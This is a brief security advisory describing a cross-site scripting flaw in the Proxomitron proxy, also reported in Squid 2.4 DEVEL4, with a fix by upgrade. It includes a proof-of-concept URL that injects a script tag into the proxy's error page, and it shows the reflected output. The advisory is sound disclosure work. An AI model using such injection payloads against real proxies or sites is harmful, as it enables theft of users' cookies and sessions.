COMMAND

    Proxomitron

SYSTEMS AFFECTED

    Proxomitron Naoko-4 BetaFour or earlier

PROBLEM

    Hiromitsu Takagi  found following.   Accessing the  following  URL
    with the browser configured to use Proxomitron as a proxy,

        http://www.example.com:9999/<SCRIPT>document.write(document.domain)</SCRIPT>

    it will cause Proxomitron to produce output like this:

        <html><head><title>The Proxomitron Reveals...</title>
        ...
        The Proxomitron couldn't connect to...<br>
        <font color=#ffff00 size=+1 > www.example.com:9999/<SCRIPT>document.write(document.domain)</SCRIPT>
        </font><br>
        The site may be busy or the web server may be down.
        ...

    and this will be shown as the following:

        Error connecting to site
        The Proxomitron couldn't connect to...
        www.example.com:9999/www.example.com
        The site may be busy or the web server may be down.

    The noteworthy point is that the JavaScript code will be  executed
    on an arbitrary specified domain.

    Therefore, a malicious JavaScript code written by an attacker  can
    be  executed  in  the  browser  and  the  Cookies  issued  from an
    arbitrary specified site can be stolen.

    The same problem was found in Squid 2.4 DEVEL4.

SOLUTION

    Apply Proxomitron Naoko-4 BetaFive:

        http://spywaresucks.org/prox/beta.html